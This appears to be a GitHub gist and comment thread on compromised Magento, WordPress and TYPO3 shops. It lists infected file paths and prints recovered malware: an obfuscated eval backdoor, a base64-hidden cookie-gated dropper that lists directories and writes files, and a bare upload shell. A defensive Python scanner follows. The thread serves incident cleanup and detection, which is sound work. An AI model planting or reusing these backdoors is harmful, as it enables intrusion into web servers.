@ins0
Last active March 23, 2021 07:21
This is a short list of infected files from domains on the list of compromised online shops by @gwillem.
**hacked-stores-in-last-48hrs.txt**
https://gist.github.com/gwillem/e7c77b77d508928ad67860970c366cae
If you have to deal with this, it may help you find infected files.
./html/devsys/adminerc2q.php
./html/devsys/media/dhl/info.php
./html/livesys/media/dhl/info.php
./html/livesys/skin/skin.php
./html/magento/media/dhl/info.php
./html/wp-includes/shortcodes.php
/html/wp-includes/locale.php
./html/wp-includes/SimplePie/Cache/Base.php
./html/wp-content/themes/customizr/comments.php
./html/wp-content/themes/virtue/woocommerce/single-product/price.php
./html/wp-content/themes/virtue/7567567567.php
./html/wp-content/themes/virtue/page-blog.php
./html/wp-content/themes/virtue/404.php
./html/wp-content/themes/catch-kathmandu/sidebar-header-top.php
./html/includes/.src/Mage/Archive/css.php
./html/includes/.src/Mage/Centinel/dump.php
./html/includes/.src/Mage/PaypalUk/defines.php
./html/includes/.src/Magpleasure/Filesystem/db.php
./html/includes/.src/Varien/Pear/info.php
./html/includes/.src/Zend/Gdata/diff.php
./html/includes/.src/Zend/Http/sql.php
./html/includes/.src/Zend/Measure/db.php
./html/includes/.src/Zend/Paginator/sql.php
./html/lib/Zend/Controller/include.php
./html/lib/Zend/Currency/css.php
./html/lib/Zend/OpenId/Extension/template.php
./html/skin/frontend/{customfolder}/header.php
./html/var/package/tmp/article.php
./html/{customfolder}/media/dhl/info.php
./html/{customfolder}/skin/omo.php
./html/{customfolder}/skin/skins2.php
./html/magento/skin/Signedint.php
./html/magento/skin/install/default/install.php
./html/magento/skin/test.php
./html/magento/var/package/pack.php
./html/piwik/tmp/cache/tracker/PluginTranslations-de-4c5c90167f7f8091f2885497b017f3d6.php
./html/app/code/community/VladimirPopov/WebForms/Block/Adminhtml/Webforms.php
./html/app/code/community/VladimirPopov/WebForms/Block/Adminhtml/Webforms/Edit.php
./html/app/code/community/VladimirPopov/WebForms/Block/Webforms.php
./html/app/code/community/VladimirPopov/WebForms/controllers/Adminhtml/FieldsController.php
./html/app/code/community/VladimirPopov/WebForms/controllers/Adminhtml/WebformsController.php
./html/includes/src/VladimirPopov/WebForms/controllers/Adminhtml/FieldsController.php
./html/includes/src/VladimirPopov/WebForms/controllers/Adminhtml/WebformsController.php
./html/includes/src/VladimirPopov_WebForms_Block_Adminhtml_Webforms.php
./html/includes/src/VladimirPopov_WebForms_Block_Adminhtml_Webforms_Edit.php
./html/includes/src/VladimirPopov_WebForms_Block_Webforms.php
./html/media/dhl/info.php
./html/skin/error.php
./html/skin/ren1.php
./html/typo3/db2.php
./html/typo3/index.php
./html/typo3/sitemap.php
./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx
@gwillem

gwillem commented Oct 18, 2016

Great! Would you mind sharing some content, such as ./html/wp-includes/SimplePie/Cache/Base.php or ./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx?

@ins0

ins0 commented Oct 18, 2016

I will try to get the contents of these files

@ins0

ins0 commented Oct 18, 2016

@gwillem

./html/wp-includes/SimplePie/Cache/Base.php

```php
$qV="stop_";$s20 = strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q170405'])){eval(${$s20}['q170405']);}?><?php

// if (isset($_POST['q170405'])) {
//    eval($_POST['q170405']);
// }
```

./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx

```php
$b='ba'.'se'.(32*2).'_d'.'eco'.'de'; // base64_decode
$f='cr'.'ea'.'te_fu'.'nc'.'ti'.'on'; // create_function

$c=$b("JHBhc3MgPSAnYTYxYWZhMDdjMDMzMDBlMjAwNDhkNjQ0MTkyNWZkYjUnOw0KJGIgPSAnYicuJ2FzJy4nZTYnLic0X2QnLidlYycuJ29kZSc7DQokZnAgPSAnZmlsJy4nZV9wJy4ndXRfYycuJ29udCcuJ2VudCcuJ3MnOw0KJHNkID0gJ3NjJy4nYW5kJy4naXInOw0KJGN3ZCA9ICdnZScuJ3RjJy4nd2QnOw0KJG0gPSAnbScuJ2QnLigyKzMpOw0KDQppZiAoIWlzc2V0KCRfQ09PS0lFWydzdG9yYWdlX2xvY2FsX3ByYWdtYSddKSkgew0KICAgIG5vdF9mb3VuZCgpOw0KfSBlbHNlaWYgKGlzc2V0KCRfQ09PS0lFWydzdG9yYWdlX2xvY2FsX3ByYWdtYSddKSAmJiAkbSgkX0NPT0tJRVsnc3RvcmFnZV9sb2NhbF9wcmFnbWEnXSkgPT0gJHBhc3MpIHsNCiAgICBlY2hvICRjd2QoKTsNCiAgICBpZiAoaXNzZXQoJF9SRVFVRVNUWydkaXInXSkpIHsNCiAgICAgICAgcHJpbnRfcigkc2QoJF9SRVFVRVNUWydkaXInXSkpOw0KICAgIH0NCiAgICBpZiAoaXNzZXQoJF9SRVFVRVNUWydhbGFza2EnXSkpIHsNCiAgICAgICAgQCRmcCgkX1JFUVVFU1RbJ2FsYXNrYSddLCAkYigkX1JFUVVFU1RbJ2NvZGUnXSkpOw0KICAgIH0gICAgDQp9DQoNCmZ1bmN0aW9uIG5vdF9mb3VuZCgpDQp7DQogICAgaGVhZGVyKCdIVFRQLzEuMCA0MDQgTm90IEZvdW5kJyk7DQogICAgZGllKHByaW50KCdOb3QgRm91bmQnKSk7DQp9");

/**
    $pass = 'a61afa07c03300e20048d6441925fdb5';
    $b = 'b'.'as'.'e6'.'4_d'.'ec'.'ode';
    $fp = 'fil'.'e_p'.'ut_c'.'ont'.'ent'.'s';
    $sd = 'sc'.'and'.'ir';
    $cwd = 'ge'.'tc'.'wd';
    $m = 'm'.'d'.(2+3);

    if (!isset($_COOKIE['storage_local_pragma'])) {
        not_found();
    } elseif (isset($_COOKIE['storage_local_pragma']) && $m($_COOKIE['storage_local_pragma']) == $pass) {
        echo $cwd();
        if (isset($_REQUEST['dir'])) {
            print_r($sd($_REQUEST['dir']));
        }
        if (isset($_REQUEST['alaska'])) {
            @$fp($_REQUEST['alaska'], $b($_REQUEST['code']));
        }
    }

    function not_found()
    {
        header('HTTP/1.0 404 Not Found');
        die(print('Not Found'));
    }
**/

$f('', '};'.$c.'{'); // create_function('', };'.###CODE_ABOVE###.'{')
```

I also found a 404.php which is basically a simple file upload script (like the script above) - maybe these files were uploaded with these scripts.

/html/wp-content/themes/virtue/404.php

```php
<?php
if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
?>
```
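The three samples above hide their real function names with two string tricks (indexing characters out of a literal such as `"stop_"`, and gluing short fragments plus tiny arithmetic like `(32*2)` together) before feeding `eval`, `create_function` or `move_uploaded_file`. The following scanner is an added example, not part of this gist or of any scanner the commenters mention; it undoes both tricks on a PHP source, flags the reconstructed names when they are dangerous sinks or request superglobals, and walks a webroot (including the `.phpx` extension the dropper above used). The `SAMPLE_*` inputs are constructed from the snippets posted above, with the long base64 payload replaced by a placeholder, and the upload-validation check is a simple keyword heuristic.

```python
"""Scanner for the obfuscation tricks seen in the samples posted above.

Added example, not part of the gist. It reassembles two string-hiding
tricks and flags the reconstructed names when they are dangerous sinks
or request superglobals. Sample inputs are constructed from the gist.
"""
import os
import re
from typing import Dict, List

SINKS = {"base64_decode", "create_function", "file_put_contents", "scandir",
         "md5", "eval", "assert", "system", "shell_exec", "passthru"}
SUPERGLOBALS = {"_post", "_get", "_request", "_cookie"}

# Trick 1: 'ba'.'se'.(32*2).'_d'  ->  quoted fragments and small integer
# arithmetic glued together with PHP's "." operator.
_FRAG = r"(?:'[^']*'|\"[^\"]*\"|\(\s*\d+\s*[+*]\s*\d+\s*\))"
CONCAT_RE = re.compile(_FRAG + r"(?:\s*\.\s*" + _FRAG + r")+")
ARITH_RE = re.compile(r"\(\s*(\d+)\s*([+*])\s*(\d+)\s*\)")

# Trick 2: $qV="stop_"; ... $qV[4].$qV[3]  ->  characters picked out of a
# literal by index (spelling "_post", upper-cased later to $_POST).
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*(['\"])([^'\"]*)\2\s*;")
INDEX_RE = re.compile(r"\$(\w+)\[\d+\](?:\s*\.\s*\$\1\[\d+\])+")
INDEX_ITEM_RE = re.compile(r"\[(\d+)\]")

# Direct sinks: eval/assert fed from a (possibly variable-variable) array
# lookup or a base64 decode; move_uploaded_file with no type check nearby.
EVAL_RE = re.compile(r"\b(eval|assert)\s*\(\s*(?:\$\{?\$?\w+\}?\s*\[|base64_decode)")
UPLOAD_RE = re.compile(r"move_uploaded_file\s*\(")
UPLOAD_CHECK_RE = re.compile(r"pathinfo|finfo|mime|in_array", re.IGNORECASE)  # heuristic


def _fragment_text(tok: str) -> str:
    """Literal text of one fragment: quotes stripped, (32*2) evaluated to 64."""
    m = ARITH_RE.fullmatch(tok)
    if m:
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        return str(a * b if op == "*" else a + b)
    return tok[1:-1]


def reassemble_concats(code: str) -> List[str]:
    """Join every 'fr'.'ag'.(2+3) chain back into the string it hides."""
    return ["".join(_fragment_text(p) for p in re.findall(_FRAG, m.group(0)))
            for m in CONCAT_RE.finditer(code)]


def reassemble_indexed(code: str) -> List[str]:
    """Resolve $v[4].$v[3]... chains against $v="..." assignments in the file."""
    literals: Dict[str, str] = {name: val for name, _, val in ASSIGN_RE.findall(code)}
    found = []
    for m in INDEX_RE.finditer(code):
        src = literals.get(m.group(1))
        idx = [int(i) for i in INDEX_ITEM_RE.findall(m.group(0))]
        if src is not None and all(i < len(src) for i in idx):
            found.append("".join(src[i] for i in idx))
    return found


def scan_source(code: str) -> List[str]:
    """Findings for one PHP source; an empty list means nothing matched."""
    findings = []
    for name in reassemble_concats(code) + reassemble_indexed(code):
        low = name.lower()
        if low in SINKS:
            findings.append(f"obfuscated call to {low}")
        elif low in SUPERGLOBALS:
            findings.append(f"obfuscated superglobal ${low.upper()}")
    for m in EVAL_RE.finditer(code):
        findings.append(f"{m.group(1)} fed from request data or a decoded string")
    if UPLOAD_RE.search(code) and not UPLOAD_CHECK_RE.search(code):
        findings.append("move_uploaded_file without any extension or MIME check")
    return findings


def scan_tree(root: str, exts=(".php", ".phpx")) -> Dict[str, List[str]]:
    """Walk a webroot; the gist also lists a .phpx dropper, so scan that too."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_source(fh.read())
                if findings:
                    hits[path] = findings
    return hits


# Constructed inputs: the three snippets posted above, base64 payload elided.
SAMPLE_EVAL = ('<?php $qV="stop_";$s20 = strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);'
               "if(isset(${$s20}['q170405'])){eval(${$s20}['q170405']);}")
SAMPLE_DROPPER = """<?php
$b='ba'.'se'.(32*2).'_d'.'eco'.'de';
$f='cr'.'ea'.'te_fu'.'nc'.'ti'.'on';
$fp = 'fil'.'e_p'.'ut_c'.'ont'.'ent'.'s';
$sd = 'sc'.'and'.'ir';
$m = 'm'.'d'.(2+3);
$c=$b("BASE64_PAYLOAD_ELIDED");
$f('', '};'.$c.'{');
"""
SAMPLE_UPLOAD = """<?php
if(isset($_POST['Submit'])){
    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    $abod = $filedir.$userfile_name;
    @move_uploaded_file($userfile_tmp, $abod);
}
"""

if __name__ == "__main__":
    for label, src in (("eval", SAMPLE_EVAL), ("dropper", SAMPLE_DROPPER), ("upload", SAMPLE_UPLOAD)):
        print(label, "->", scan_source(src))
```

Run it as `python scanner.py` to see the findings for the three samples, or call `scan_tree("/path/to/html")` from a cleanup script. Regex reassembly is deliberately narrow (single-level concatenation, `+`/`*` on two integers) so it stays readable; a real deployment would pair it with an allowlist of known-good file hashes, since theme and library files are the ones these samples were dropped into.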

@gwillem

gwillem commented Mar 13, 2018

For future reference, I have included these and many other malware samples in the Magento Malware Scanner
